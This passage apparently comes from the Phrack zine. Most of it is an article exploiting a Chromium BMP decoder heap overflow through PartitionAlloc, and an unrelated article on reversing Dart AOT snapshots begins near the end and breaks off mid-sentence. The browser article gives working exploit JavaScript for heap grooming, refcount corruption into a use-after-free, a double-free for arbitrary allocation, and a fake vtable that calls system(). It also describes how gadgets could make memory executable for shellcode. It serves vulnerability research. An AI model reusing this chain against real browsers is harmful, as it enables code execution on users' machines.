objects and cross-cache overflow, we can abuse PartitionAlloc and exploit,
in theory, any memory write bug, resulting in full shellcode execution.
---[ 1 - Chromium rendering engine overview
Chromium, and all Chromium-based browsers, use the "Blink rendering
engine" [1]. This component is responsible for much of what happens
within the renderer process, such as parsing HTML, CSS, decoding
images, and more.
"A browser engine (also known as a layout engine or rendering engine)
is a core software component of every major web browser. The primary
job of a browser engine is to transform HTML documents and other
resources of a web page into an interactive visual representation
on a user's device." [2]
Blink is used by Chromium, but is considered a separate library. Its code
can be found within the Chromium source at `src/third_party/blink`, and
its own repository can be found here [3].
While it is the responsibility of Blink, not all major functions are
necessarily written in its code. For example, executing JavaScript is
necessary for a rendering engine, but not all of the JS engine is part
of the main code.
This is the case with V8, the JavaScript engine used, which is separate
in the code at `v8/`. It also has its own repository [4]. The same applies
to some image formats [5] and video formats [6]. However, other image
formats are entirely processed by Blink, such as "BMP", "AVIF", and some
others.
We can see them in `src/third_party/blink/renderer/platform/image-decoders`
---[ 2 - Case study: BMP 0day
After spending some time fuzzing these isolated image formats, I was able
to find a very interesting bug, a "heap-overflow" within BMPImageDecoder
(ASAN shows it as if the overflow happened within Skia, resulting in an
incorrect title for the CVE [7]). Let's understand how this bug occurs,
and what its primitives are! We can start by analyzing the
ASAN stack trace:
r3tr0@chrome:~/fuzz/bmp$ cat /tmp/bad.bmp | ./test-crash
=875756 ERROR: AddressSanitizer: heap-buffer-overflow on address[redacted]
READ of size 32 at 0x521000001100 thread TO
#0 0xdead in unsigned int vector [8] skcms_private::hsw::load()
#1 0xdead in skcms_private::hsw::Exec_load_8888_k()
#2 0xdead in skcms_private::hsw::Exec_load_8888()
#3 0xdead in skcms_private:: hsw::exec_stages ()
#4 0xdead in skcms_private::hsu::run_program()
#5 0xdead in skcms_Transform
#6 0xdead in blink::BMPImageReader::ColorCorrectCurrentRow()
#7 0xdead in blink::BMPImageReader::ProcessRLEData()
#8 0xdead in blink::BMPImageReader::DecodePixelData(bool)
#9 0xdead in blink::BMPImageReader::DecodeBMP(bool)
#10 0xdead in blink::BMPImageDecoder::DecodeHelper(bool)
#11 0xdead in blink::BMPImageDecoder::Decode(bool)
#12 0xdead in blink::ImageDecoder::DecodeFrameBufferAtIndex()
[redacted]
The last function within blink is BMPImageReader::ColorCorrectCurrentRow().
We can see a snippet of this function below:
void BMPImageReader::ColorCorrectCurrentRow() {
...
// address calc here
ImageFrame::PixelData* const row = buffer_->GetAddr(0, coord_.y());
...
const bool success =
skcms_Transform(row, fmt, alpha, transform->SrcProfile(), row, fmt, alpha,
transform->DstProfile(), parent_->Size().width());
DCHECK(success);
buffer_->SetPixelsChanged(true);
}
With a little debugging help, we can conclude that there is an address
calculation error in `buffer_->GetAddr(0, coord_.y());`, where this
function ends up being resolved to this other inline function:
const uint32_t* addr32(int x, int y) const {
SkASSERT((unsigned)x < (unsigned)fInfo.width());
SkASSERT((unsigned)y < (unsigned)fInfo.height());
return (const uint32_t*)((const char*)this->addr32() + (size_t)y * fRowBytes + (x << 2));
}
This function can also be summarized in a single line
`this->addr32() + y * fRowBytes + (x << 2)`.
Somehow `coord_.y()` is equal to -1 in the iteration that causes a crash,
and if we resolve this calculation with this value we can understand why:
this->addr32() + y * fRowBytes + (x << 2);
base_addr + -1 * fRowBytes + (0 << 2);
base_addr - fRowBytes;
Assuming the variables we know, `this->addr32()` is the base address of
the image decoding chunk, y is -1, and x is equal to 0.
Thus, the result will be the base address minus fRowBytes, resulting in
an address pointing behind the start of the chunk, and the function
subsequently called within Skia that effectively writes into this input
buffer. We can treat this like a `memcpy`. The flaw is not in the
function but in what is passed to it.
Looking at the patch [8] makes it clearer why this happens. It's a simple
off-by-one bug, where the `ColorCorrectCurrentRow()` function is called
one more time than expected. Since decoding occurs `top_down`, with
each iteration 1 is subtracted from y, instead of ending at 0, the next
iteration happens and subtracting y once again turns it into -1.
----[ 2.1 - Bug power, the primitives
Very good, but what kind of primitives does this bug give us? Where and
what can we write? Analyzing the `skcms_Transform` function, it receives
a kind of "bytecodes" for an image transformation VM. The important part
is that we don't control the bytecode sent, only the input buffer, so we
can't control what is written. Let's analyze an example at runtime and
see what happens:
pwndbg> x/6gx $rdi
0x1180136a000: 0x4141414141414141 0x4242424242424242
0x1180136a010: 0x4343434343434343 0x4444444444444444
0x1180136a020: 0x4545454545454545 0xff00ff00ff00ff00
pwndbg> continue
[redacted]
pwndbg> x/6gx 0x1180136a000
0x1180136a000: 0x4100000041000000 0x4200000042000000
0x1180136a010: 0x4300000043000000 0x4400000044000000
0x1180136a020: 0x4500000045000000 0xff00ff00ff00ff00
Basically, we can only write null bytes with the exception of bytes 0xff
which are ignored. The most-significant-byte of every 4 bytes is also
ignored. These are quite limited writing primitives, but still powerful.
Now that we know what we can write, let's see where we can write. Going
back to the address calculation, the only variable we haven't talked about
is fRowBytes.
In our case this variable is always 1/4 of the chunk size, which we can
partially control using the height and width of the image. This results
in a partial overflow of the end of the last chunk, assuming the BMP image
chunk has 0x1000 bytes, the last 0x400 bytes will be corrupted:
0x400 bytes corrupted
\ /
+---------------------+--------------------+
| |XXXXX| |
| Another chunk |XXXXX| BMP chunk(0x1000) |
| |XXXXX| |
+---------------------+--------------------+
Now everything seems like a lost cause, since we can only write null bytes.
The best idea is to overwrite a `ref_count_` property, but all of them are
located at the beginning of the chunk. To move forward, we need to better
understand how Chromium's custom memory allocator works.
---[ 3 - PartitionAlloc, the memory allocator
"PartitionAlloc is a memory allocator optimized for space efficiency,
allocation latency, and security." [9] (and developed by Google and used
in Chromium by default)
Quickly, we can highlight the most important things about PartitionAlloc:
- It's a SLAB allocator, which means it pre-allocates memory and
organizes it into fixed-size chunks, which is very important from
a security perspective.
- There's a thread cache, like tcache in glibc heap.
- There are some "soft-protections" against certain types of memory
management bugs, like double-free.
- After freeing a slot, the freelist pointer is written in
big-endian at the beginning of this slot.
>> When exploring a SLAB allocator, similar to the kernel, we expect a
very direct exploitation path. Only objects of the same size are
allocated adjacent to each other. Therefore, the vulnerable object
and the victim must share the same size or similar.
Everything in PartitionAlloc is allocated within "pages", which can be:
- System Page
A page defined by the OS, typically 4KiB, but supports up to 64KiB.
- Partition Page
Consists of exactly 4 system pages.
- Super Page
A 2MiB region, aligned on a 2MiB boundary.
- Extent
An extent is a run of consecutive super pages.
System Page
^
+------+
| |
+------+
Partition Page
^
+------+------+------+------+
| | | | |
+------+------+------+------+
Super page (2MiB)
^
+-----------------------------------------------------+
| |
+-----------------------------------------------------+
Within each Super Page, several Partition Pages are allocated, where the
smallest memory units can be divided into:
- Slot: is a single unit chunk
- Slot span: is a run of same-sized chunks
- Bucket: Chains slot spans containing slots of similar size
+-------------------+ +------------------+ +-------------+
|...| PartitionPage | -> | SlotSpanMetadata | -> |freelist_head|
+-------------------+ +------------------+ |-------------|
\ / | bucket |
\ / +-------------+
\ / |
\ / V
+--------------------------------------------------+ +------------------+
| | | | | | | | Partition Bucket |
| Guard | Metadata | Guard | N pages | ... | Guard | +------------------+
| | | | | | |
+--------------------------------------------------+
Super Page
An entire Super Page is allocated as follows: Right at the beginning there
are 3 pages (2 "Guard Pages" which are pages with PROT_NONE to prevent any
kind of linear corruption, and a Metadata page between the other two). This
page has a list of "Partition Pages", which is a struct that controls some
information about the Partition Pages. It also has the SlotSpanMetadata
property, which, besides the freelist_head of that span, has the pointer
to that Bucket.
+------------------+
| Partition Bucket |-------+ +----+
+------------------+ | | |
v | v
+--------------------------------------------------+
| | | | | | |
| Guard | Metadata | Guard | N pages | ... | Guard |
| | | | | | |
+--------------------------------------------------+
Each Partition Bucket is a linked list to other buckets of similar sizes.
This is a single slot
| +-----------------+
+------->|0x1000|0x1000|...|
|-----------------| -> this is a slot span
|0x1000|0x1000|...|
+-----------------+
\ /
\ /
\ /
\ /
+--------------------------------------------------+
| | | | | | |
| Guard | Metadata | Guard | N pages | ... | Guard |
| | | | | | |
+--------------------------------------------------+
Each Slot Span can be composed of N Partition Pages and has several slots
of exactly the same size adjacent.
PartitionAlloc also has a per-thread cache. It is built to meet the needs
of most common allocations and avoid performance loss in the central
allocator that requires a context lock to prevent two allocations from
returning the same slot.
"The thread cache has been tailored to satisfy a vast majority of
requests by allocating from and releasing memory to the main allocator
in batches, amortizing lock acquisition and further improving locality
while not trapping excess memory." [10]
----[ 3.1 - PartitionAlloc security guarantees
When looking from a security perspective, PartitionAlloc delivers some
guarantees:
1. Linear overflows/underflows cannot corrupt into, out of, or between
partitions. There are guard pages at the beginning and the end of
each memory region owned by a partition.
2. Linear overflows/underflows cannot corrupt the allocation metadata.
PartitionAlloc records metadata in a dedicated, out-of-line region
(not adjacent to objects), surrounded by guard pages. (Freelist
pointers are an exception.)
3. Partial pointer overwrite of freelist pointer should fault.
4. Direct map allocations have guard pages at the beginning and the end.
5. One page can contain only objects from the same bucket. Even after
this page is completely freed
If we look closely, guarantees 1 and 2 basically prevent corruptions
against the Metadata Page and overflow between Super Pages. This is the
job of the "Guard Page" mentioned above, a memory page with the PROT_NONE
protection, which will cause a crash when trying to read, write, or
execute anything within that page.
Guarantee 3 simply involves storing the freelist pointer in big-endian
format. So by partially corrupting this pointer, converting it to little
endian would completely change the pointer.
Guarantee 4 is just a variation of guarantees 1 and 2, where, if it is
necessary to allocate a very large chunk that does not fit into a common
Super Page, this memory is allocated directly by mapping memory. This
mapped memory is again placed between two "Guard Pages", one at
the beginning and one at the end.
Finally, guarantee 5 is useful against type confusion attacks and attempts
to abuse a UAF between pages.
So, if you paid attention, there are no guarantees or protections that
prevent two buckets of completely different sizes from being allocated
adjacent to each other without any kind of red zone between them (as is
the case of Guard Pages between Super Pages). Therefore, it is entirely
possible and stable to create this layout:
vuln obj size=0x1000 victim obj size=0x4000
+----------+ +----------+
| ... | | victim |
|----------| |----------|
| vuln | | ... |
+----------+ +----------+
\ \ / /
\ \ / /
\ \ / /
\ \/ /
+---------------------------------------------------+
| | | | | | | |
| G | M | G | 2 pages | 3 pages | ...N pages | G |
| | | | | | | |
+---------------------------------------------------+
Testing the hypothesis, I could verify that we can create extremely stable
memory layouts with the same objects of different sizes adjacent to each
other.
---[ 4 - Exploitation
With the possibility of overflowing into any other slot of a different
size, we just need to find an interesting target. We could search for an
object with a |length_| property, but since we can only write null bytes,
I believe we can take more advantage of the bug by attacking a
|ref_count_| property. Looking for references of good targets, we can
follow existing work used to exploit the well-known "The WebP 0day" [11].
Objects and structures in CSS are allocated by Blink itself. Among these
objects is CSSVariableData, which represents the value of variables within
CSS [12]. It seems to be a great target for several reasons:
- It's an elastic object, so we can force it to fit in our case or any
other; this object can vary in size between 16 bytes and
2097152 bytes (`kMaxVariableBytes`).
- It's a "ref counted" object.
- It doesn't have any pointers that could cause a crash when
dereferenced.
In `css_variable_data.h`, we can see the description of the object:
class CORE_EXPORT CSSVariableData : public RefCounted {
...
private:
...
// 32 bits refcount before this.
// We'd like to use bool for the booleans, but this causes the struct to
// balloon in size on Windows:
// https://randomascii.wordpress.com/2010/06/06/bit-field-packing-with-visual-c/
// Enough for storing up to 2MB (and then some), cf. kMaxSubstitutionBytes.
// The remaining 4 bits are kept in reserve for future use.
const unsigned length_ : 22;
const unsigned is_animation_tainted_ : 1; // bool.
const unsigned needs_variable_resolution_ : 1; // bool.
const unsigned is_8bit_ : 1; // bool.
unsigned has_font_units_ : 1; // bool.
unsigned has_root_font_units_ : 1; // bool.
unsigned has_line_height_units_ : 1; // bool.
const unsigned unused_ : 4;
In memory, this object reflects this layout:
0 4 8 16
+------------+----------+-+-------------------------+
| ref_count_ | length_ |F| String content |
+------------+----------+-+-------------------------+
| String content... |
+---------------------------------------------------+
> F = flags
And the code that allocates this object can be found in the same file:
// third_party/blink/renderer/core/css/css_variable_data.h:34
static scoped_refptr Create(StringView original_text,
bool is_animation_tainted,
bool needs_variable_resolution,
bool has_font_units,
bool has_root_font_units,
bool has_line_height_units) {
if (original_text.length() > kMaxVariableBytes) {
// This should have been blocked off during variable substitution.
NOTREACHED();
return nullptr;
}
wtf_size_t bytes_needed =
sizeof(CSSVariableData) + (original_text.Is8Bit()
? original_text.length()
: 2 * original_text.length());
void* buf = WTF::Partitions::FastMalloc(
bytes_needed, WTF::GetStringWithTypeName());
return base::AdoptRef(new (buf) CSSVariableData(
original_text, is_animation_tainted, needs_variable_resolution,
has_font_units, has_root_font_units, has_line_height_units));
}
Well, it seems like a great target, but now we need to discuss which
bucket this object will be allocated in. Due to the thread cache, the
objects won't be placed together. We need to force the thread cache to
clear the bucket so that our vulnerable object and victim share the same
Super Page. Luckily, this is quite simple to do. We just need to fill the
cache up to the "limit", as can be seen in this comment:
// base/allocator/partition_allocator/src/partition_alloc/thread_cache.cc:586
// For each bucket, there is a |limit| of how many cached objects there are in
// the bucket, so |count| < |limit| at all times.
// - Clearing: limit -> limit / 2
// - Filling: 0 -> limit / kBatchFillRatio
The code that executes this subroutine can be seen below:
// base/allocator/partition_allocator/src/partition_alloc/thread_cache.h:511
PA_ALWAYS_INLINE bool ThreadCache::MaybePutInCache(uintptr_t slot_start,
size_t bucket_index,
size_t* slot_size) {
PA_REENTRANCY_GUARD(is_in_thread_cache_);
...
auto& bucket = buckets_[bucket_index];
...
uint8_t limit = bucket.limit.load(std::memory_order_relaxed);
// Batched deallocation, amortizing lock acquisitions.
if (PA_UNLIKELY(bucket.count > limit)) {
ClearBucket(bucket, limit / 2);
}
...
Now let's create this layout with JS. How can we manipulate these objects
to create a perfect layout?
First, let's force the allocation of a new Super Page to have more
control, for this, we can simply do several sprays
let div0 = document.getElementById('div0');
for (let i = 0; i < 30; i++) {
div0.style.setProperty(`--sprayA${i}`, kCSSString);
div0.style.setProperty(`--sprayC${i}`, kCSSStringCross0x2000);
div0.style.setProperty(`--sprayB${i}`, kCSSStringHRTF);
}
After that, let's force object A to be adjacent to C. Object B should be
allocated close, but not adjacent to, the others as it will be useful for
acquiring memory leaks.
for (let i = 0; i < 50; i++) {
for (let j = 0; j < 4; j++) {
// spraying allocation of 2 different size spans
// very close to 100% of attempts, the same object is allocated
// after a different sized slot
const CSSValName = `${i}.${j}`.padEnd(0x7fcc, 'A');
div0.style.setProperty(`--a${i}.${j}`, CSSValName);
const CSSValName2 = `${i}.${j}`.padEnd(0x1fcc, 'C');
div0.style.setProperty(`--c${i}.${j}`, CSSValName2);
}
for (let j = 0; j < 64; j++) {
const CSSValName = `${i}.${j}`.padEnd(0x414, 'B');
div0.style.setProperty(`--b${i}.${j}`, CSSValName);
}
}
And finally, let's clear the bucket to finish preparing our layout:
for (let i = 10; i < 30; i++) {
div0.style.removeProperty(`--a${i}.2`);
}
for (let i = 46; i > 20; i--) {
div0.style.removeProperty(`--c${i}.0`);
}
gc(); await sleep(500);
Now, after creating the correct heap layout, we will overwrite the
`ref_count_`, trigger a free, and allocate a fully controllable data
object over the victim object, thus creating a UAF condition.
We can abuse our conditional writing of null bytes. If you recall
that 0xff bytes are ignored, so we can increase the `ref_count_` to
`0xff01` and trigger the vulnerability. After this, the ref count will
be `0xff00`, and calling `gc();` will free this object while we still
have an active reference.
>> Remember: Actually, the `ref_count_` starts with 2, so we need to
increase this to `0xff02`, otherwise the ref_count will reach in -1
and cause a crash
+------------+----------+-+-------------------------+
| 2 | 0x2000 |F| "AAAAAAAAAAAA" |
+------------+----------+-+-------------------------+
| "AAAAAAAAAAAA..." |
+---------------------------------------------------+
|
| increase `ref_count_` (+0xff00)
|
v
+------------+----------+-+-------------------------+
| 0xff02 | 0x2000 |F| "AAAAAAAAAAAA" |
+------------+----------+-+-------------------------+
| "AAAAAAAAAAAA..." |
+---------------------------------------------------+
|
| Trigger vuln
|
v
+------------+----------+-+-------------------------+-------------------+
| 0xff00 | 0x0000 |F| "A\x00\x00\x00" | |
+------------+----------+-+-------------------------+ BMP vuln chunk... |
| "A\x00\x00\x00..." | |
+---------------------------------------------------+-------------------+
|
| Call `gc();` and decrease
| `ref_count_` (-0xff00)
v
+-------------------------+-------------------------+
| freelist ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
Perfect! We can use any object to consume this freelist entry and overwrite
the |length_| property. For this, we will use an AudioArray that we can
control entirely. AudioArray is also an elastic object that has been used
to exploit another type of UAF previously [13].
Now we can OOB read:
fetch("/bad.bmp").then(async response => {
let rs = getComputedStyle(div0);
let imageDecoder = new ImageDecoder({
data: response.body,
type: "image/bmp"
});
increase_refs(0xff02); // overflow will overwrite 0xff02 to 0xff00
imageDecoder.decode().then(async () => {
gc(); gc();
await sleep(2500);
let ab = new ArrayBuffer(0x600);
let view = new Uint32Array(ab);
// fake CSSVariableData
view[0] = 1; // ref_count
const newCSSVarLen = 0x19000;
view[1] = newCSSVarLen | 0x01000000; // length and flags, set is_8bit_
for (let i = 2; i < view.length; i++)
view[i] = i;
await allocAudioArray(0x2000, ab, 1);
leak();
})
});
async function leak() {
console.log("continuing...");
let div0 = document.getElementById('div0');
let rs = getComputedStyle(div0);
let CSSLeak = rs.getPropertyValue(kTargetCSSVar).substring(0x15000 - 8);
console.log(CSSLeak.length.toString(16));
...
Good, but not enough, we've defeated any ASLR, but now we need a control
flow hijacking idea. Instead of looking for more good victim objects, we
can directly attack PartitionAlloc again and corrupt the freelist pointer.
The idea is to create a double-free condition, which will result in an
circular freelist and ultimately overwrite the pointer.
CSSVariableData and AudioArray essentially point to the same address, so
we can cause both of them be freed and cause a "double-free". If we do
this, the freelist pointer written in the chunk will point to itself:
+----------+
| | It's pointing at itself
| v
| +-------------------------+-------------------------+
+----| freelist ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
This circular freelist is extremely powerful, because we can use the same
AudioBuffer as before to corrupt the freelist pointer. The next allocation
request will return the pointer we want, giving us an arbitrary write.
+----------+
| | It's pointing at itself
| v
| +-------------------------+-------------------------+
+----| freelist ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
|
| Alloc an AudioArray and corrupt freelist
|
v
+-------------------------+-------------------------+
| corrupted ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
The only restriction for the corrupted pointer is that it must be from
within the same Super Page. To achieve code execution, we will deallocate
object B and allocate objects that have vtables, then corrupt the
freelist to point to one of these objects. This way, we can corrupt the
vtable pointer and easily gain control flow hijack. Follow snipped of
exploit alloc the vtable object and leaks its address:
CSSVars = [
// this regex is used to find the B objects in memory
// the pattern match with: 0x2000 + flags + "${i}.${j}" + "BBBBB..."
...CSSLeak.matchAll(/\x02\x00\x00\x00\x14\x04\x00\x01(\d+\.\d+)/g)
];
...
for (let i = 0; i < kSprayPannerCount; i++) {
panners.push(audioCtx.createPanner());
}
for (let i = 0; i < kSprayPannerCount; i++) {
// i really idk why, but i need add the ref_count_ and remove the
// prop to trigger free
rs.getPropertyValue(`--b${CSSVars[i][1]}`);
div0.style.removeProperty(`--b${CSSVars[i][1]}`);
}
gc(); gc(); await sleep(1000);
for (let i = 0; i < panners.length; i++) {
// allocating objects with vtables
panners[i].panningModel = 'HRTF';
}
// free two panners after target CSSVariableData
panners[kSprayPannerCount - 2].panningModel = 'equalpower';
panners[kSprayPannerCount - 1].panningModel = 'equalpower';
await sleep(1000);
let hrtfLeak = rs.getPropertyValue(kTargetCSSVar).substring(0x15000 - 8);
And now just create the fake vtable and profit!!
let ab = new ArrayBuffer(0x600);
let abFakeObj = new ArrayBuffer(0x600);
let view = new BigUint64Array(ab);
let viewFakeObj = new DataView(abFakeObj);
view[0] = swapEndian(fakePannerAddr - 0x10n);
for (let i = 0; i < viewFakeObj.byteLength; i++)
viewFakeObj.setUint8(i, 0x4a); // "J"
const system_addr = chromeBase + kSystemLibcOffset;
// call qword ptr [rax + 8]
viewFakeObj.setBigUint64(0x0, fakePannerAddr + 8n - 8n, true);
// viewFakeObj.setBigUint64(8, 0xdeadbeefn, true);
viewFakeObj.setBigUint64(0x8, chromeBase + kWriteListenerOffset, true);
// fake BindState addr
viewFakeObj.setBigUint64(0x10, fakePannerAddr + 0x18n, true);
// start of fake BindState
// The first int64 are the value which will passed to function address
// in second int64
viewFakeObj.setBigUint64(0x18 + 0,
// 0x636c616378 == xcalc
0x636c616378n /* -1 because ref_count_ + 1 */ - 1n, true);
viewFakeObj.setBigUint64(0x18 + 0x8, system_addr, true);
In this case, I simply use a simple `system("xcalc")`.
For a more complex exploit, we can use a sequence of more complete gadgets.
Chromium has some super powerful gadgets that allow executing shellcode
easily. You can use `blink::FileSystemDispatcher::WriteListener::DidWrite`,
followed by a fake `BindState`. With these two, we can call any function
by controlling RDI, that is, the first argument of the function.
By combining with `content::ServiceWorkerContextCore::OnControlleeRemoved`,
we can choose a function and N arguments. With this power, we call the
function `v8::base::AddressSpaceReservation::SetPermissions` and assign it
to a memory page RWX. The only thing we need to do is corrupt a second
object with a vtable and make it point to this RWX page after copying some
shellcode to it.
If you want to see a full exploit using these techniques, you can check out
the previously mentioned exploits here [11] [13].
---[ 5 - Takeaways, advances, etc etc etc
This article attempts to dissect the most important points about
PartitionAlloc and explain recent techniques like
"double-free2arbitrary-allocation", and completely new techniques like
"cross-bucket overflow".
These techniques can be used, in theory, to exploit any memory corruption
bug in PartitionAlloc, which is fascinating for weaponizing seemingly
insufficient bugs. Many of these techniques are reminiscent of tricks from
recent years in the kernel exploit scene, such as "elastic-objects" and
"cross-cache overflow". High-performance allocators tend to share
vulnerabilities inherent in their operation and performance.
As mentioned above, the memory allocator is an extremely critical
component in high-performance software like a browser, and it must be
extremely simple and fast. This simplicity comes at a cost in security.
Chromium has great security measures like "safe libc++" that can prevent
a large number of vulnerabilities, but after the first memory corruption,
the attacker's scenario is very privileged and few things can stop them.
All recent new mitigations have been focused on mitigating memory
corruptions coming from the JS engine, as is the case with the
well-crafted V8 sandbox. However, this is not enough. Although JavaScript
is an extremely bug-prone subsystem, many other areas continue to have
little research coverage.
---[ 6 - References
[1] https://www.chromium.org/blink/#what-is-blink
[2] https://en.wikipedia.org/wiki/Browser_engine
[3] https://chromium.googlesource.com/chromium/blink/
[4] https://chromium.googlesource.com/v8/v8/
[5] http://libpng.org/
[6] https://chromium.googlesource.com/webm/libvpx/
[7] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-1283
[8] https://chromium-review.googlesource.com/c/chromium/src/+/5241305/7/
third_party/blink/renderer/platform/image-decoders/bmp/bmp_image_reader.cc
[9] https://chromium.googlesource.com/chromium/src/+/master/base/
allocator/partition_allocator/PartitionAlloc.md#overview
[10] https://chromium.googlesource.com/chromium/src/+/master/base/
allocator/partition_allocator/PartitionAlloc.md#performance
[11] https://www.darknavy.org/blog/exploiting_the_libwebp_vulnerability_part_2/
[12] https://developer.mozilla.org/en-US/docs/Web/CSS/Using_CSS_custom_properties
[13] https://securitylab.github.com/research/one_day_short_of_a_fullchain_renderer/
---[ 7 - Exploit Code
|=[ EOF ]=--------------------------------------------------------------=|
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0B of 0x11
|=-----------------------------------------------------------------------=|
|=---------------=[ Reversing Dart AOT snapshots ]=----------------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ cryptax ]=--------------------------------=|
|=-----------------------------------------------------------------------=|
-- Table of contents
0 - Introduction
1 - First steps at disassembling an AOT snapshot
1.1 No entry point
1.2 Function prologue
1.3 Access to strings
1.4 Function arguments are pushed on the stack
1.5 Small integers are doubled
2 - Dart assembly registers
3 - The THR register
4 - The Dart Object Pool
5 - Snapshot serialization
6 - Representation of integers
7 - Function names
7.1 Stripped or non-stripped binaries
7.2 Trick for simple programs
7.3 Retrieving function names in more complex situations
8 - Conclusion and perspectives
-- 0 - Introduction
Dart is an object-oriented programming language with a C-style syntax, and
a few features such as sound null safety. Depending on the desired size vs
performance trade-off, a Dart program can be compiled in various formats:
kernel snapshots (the smallest, but the slowest), JIT snapshots, AOT
snapshots, and self-contained executables (the biggest and fastest) [1].
Dart AOT snapshots offer a particular interesting ratio and are therefore
used by Flutter release builds [2]. Flutter is an open source UI software
development kit which offers the attractive ability to develop
applications with a single code-base and compile them natively for Android
and iOS, and also non-mobile platforms.
The issue for reverse engineers is that Dart AOT snapshots are notably
difficult to reverse for the following main reasons:
1. The produced assembly code uses many unique features: specific
registers, specific calling conventions, specific encoding of
integers.
2. Information about each class used in the snapshot can only be
read sequentially. There is no random access, meaning that it is
necessary to read information about lots of potentially non-
interesting classes before we get to the one we are looking for.
3. The format is not documented and has significantly evolved since
the first versions.
In this article, we will explain how to understand Dart assembly, and get
the best out of disassemblers, even when they don't support Dart.
-- 1 - First steps at disassembling an AOT snapshot
To illustrate Dart assembly code, we'll work over a simple implementation
of the Caesar algorithm in Dart (alphabet translation by 3).
We encrypt/decrypt a string containing the sentence "Phrack Issue"
followed by a randomly selected issue number.
import 'dart:math'; // for Random
class Caesar {
int shift;
Caesar({this.shift = 3});
String encrypt(String message) {
StringBuffer ciphertext = StringBuffer();
for (int i = 0; i < message.length; i++) {
int charCode = message.codeUnitAt(i);
charCode = (charCode + shift) % 256;
ciphertext.writeCharCode(charCode);
}
return ciphertext.toString();
}
String decrypt(String ciphertext) {
this.shift = -this.shift;
String plaintext = this.encrypt(ciphertext);
this.shift = -this.shift;
return plaintext;
}
}
void main() {
print('Welcome to Caesar encryption');
List issues = [ 70, 71, 72 ];
Random random = Random();
final String message = 'Phrack Issue ${issues[random.nextInt(issues.length)]}';
var caesar = Caesar();
// Encrypt
String ciphertext = caesar.encrypt(message);
print(ciphertext);
// Decrypt
String plaintext = caesar.decrypt(ciphertext);
print(plaintext);
}
This source code can be compiled to the "AOT snapshot" output format (.aot
extension) using the Dart compiler:
$ dart compile aot-snapshot phrack.dart
Generated: /tmp/caesar/phrack.aot
The resulting snapshot is quite big for very simple code: 831,352 bytes
for the non stripped version, and 541,616 bytes for the stripped version
(option -S).
Let's begin with the non-stripped AOT snapshot, and load it in a
disassembler. In this article, we'll use Radare 2 [3], but the result is
largely the same with any disassembler (IDA Pro, Binary Ninja, Ghidra...).
-- 1.1 - No entry point
First of all, the disassembler fails to identify the entry point:
ERROR: Cannot determine entrypoint, using 0x0004c000
The reason for this is that the disassembler does not understand the
format of the AOT snapshot. Actually, a "Dart AOT snapshot" contains at
least 2 snapshots: one AOT snapshot for Dart itself (Dart VM), and one
AOT snapshot per isolate.
A Dart isolate is an independent unit of execution that runs concurrently
with other isolates. Each isolate has its own memory heap, stack and event
loop. There is always at least 1 isolate, possibly more if the application
needs to handle background tasks while displaying other data, for instance.
In the example below, the file contains the minimum 2 snapshots:
$ objdump -T ./phrack.aot
./phrack.aot: file format elf64-x86-64
DYNAMIC SYMBOL TABLE:
000000000004c000 g DO .text 0000000000006860 _kDartVmSnapshotInstructions
0000000000052880 g DO .text 0000000000046910 _kDartIsolateSnapshotInstructions
0000000000000200 g DO .rodata 0000000000008a10 _kDartVmSnapshotData
0000000000008c40 g DO .rodata 000000000003f9d0 _kDartIsolateSnapshotData
00000000000001c8 g DO .note.gnu.build-id 0000000000000020 _kDartSnapshotBuildId
Radare arbitrarily sets 0x4c000 as the entry point because it is the
address of the first symbol (kDartVmSnapshotInstructions). In reality,
the main() of our Dart program is contained in a Dart isolate snapshot,
and therefore its code is expected to be found within the text segment
named kDartIsolateSnapshotInstructions.
Fortunately, if the executable is not stripped, we can search for main in
function names to locate our entry point:
[0x0004c000]> afl~main
0x00096b3c 8 351 main
0x00097268 3 33 sym.main_1
sym.main_1 is a low level main() - just like __libc_start_main in C. The
real entry point for the Dart program is "main" at 0x00096b3c. In Radare,
we go to that address with the command "s" followed by the offset, and
retrieve the name of the current symbol with "is.". You can see that
main() is indeed in kDartVmSnapshotInstructions:
[0x0004c000]> s main
[0x00096b3c]> is.
nth paddr vaddr bind type size lib name demangled
2 0x00052880 0x00052880 GLOBAL OBJ 289040 _kDartIsolateSnapshotInstructions
-- 1.2 - Function prologue
The function prologue saves the base pointer on the stack and allocates
some space. Then, there is an instruction comparing the stack pointer with
an offset from register 14. What is this doing?
push rbp
mov rbp, rsp
sub rsp, 0x30
cmp rsp, qword [r14 + 0x38]
This is a Dart specificity that we'll discuss later. Let's first ask all
the questions.
-- 1.3 - Access to strings
Our program outputs the welcome message "Welcome to Caesar encryption". We
expect to see those ASCII characters loaded in the main at some point. For
example, in the assembly produced by a similar C program, we have:
lea rax, str.Welcome_to_Caesar_encryption
mov rdi, rax
call sym.imp.puts
The bytes at the address of symbol str.Welcome_to_Caesar_encryption are
the ASCII characters of the string. Reciprocally, if we search cross
references for this string ("axt"), we get the address of the lea
instruction:
[0x000012c2]> s str.Welcome_to_Caesar_encryption
[0x00002004]> px 20
- offset - 4 5 6 7 8 9 A B C D E F 1011 1213 456789ABCDEF0123
0x00002004 5765 6c63 6f6d 6520 746f 2043 6165 7361 Welcome to Caesa
0x00002014 7220 656e r en
[0x00002004]> axt
main 0x139b [DATA:r--] lea rax, str.Welcome_to_Caesar_encryption
With the Dart assembly, we have no such thing. Those are the instructions
before the first call to print(). One way or another, the string "Welcome
to Caesar encryption" has to be provided, but we can't see it. We can only
assume it is referenced by r15 + 0x168f, but what is r15, and where does
that go?
mov r11, qword [r15 + 0x168f]
mov qword [rsp], r11
call sym.printToConsole
From another angle, we do find the string in the list of strings ("iz") at
address 0x00033680, but there is apparently no reference to it ("axt" does
not return any hit):
[0x00096b3c]> iz~Welcome
2589 0x00033680 0x00033680 28 29 .rodata ascii Welcome to Caesar encryption
[0x00096b3c]> axt @ 0x00033680
So, this is yet another mystery to solve: how are strings accessed? What
is in r15? What is at r15 + 0x168f?
-- 1.4 - Function arguments are pushed on the stack
There is something else to notice in the Dart assembly above. Normally,
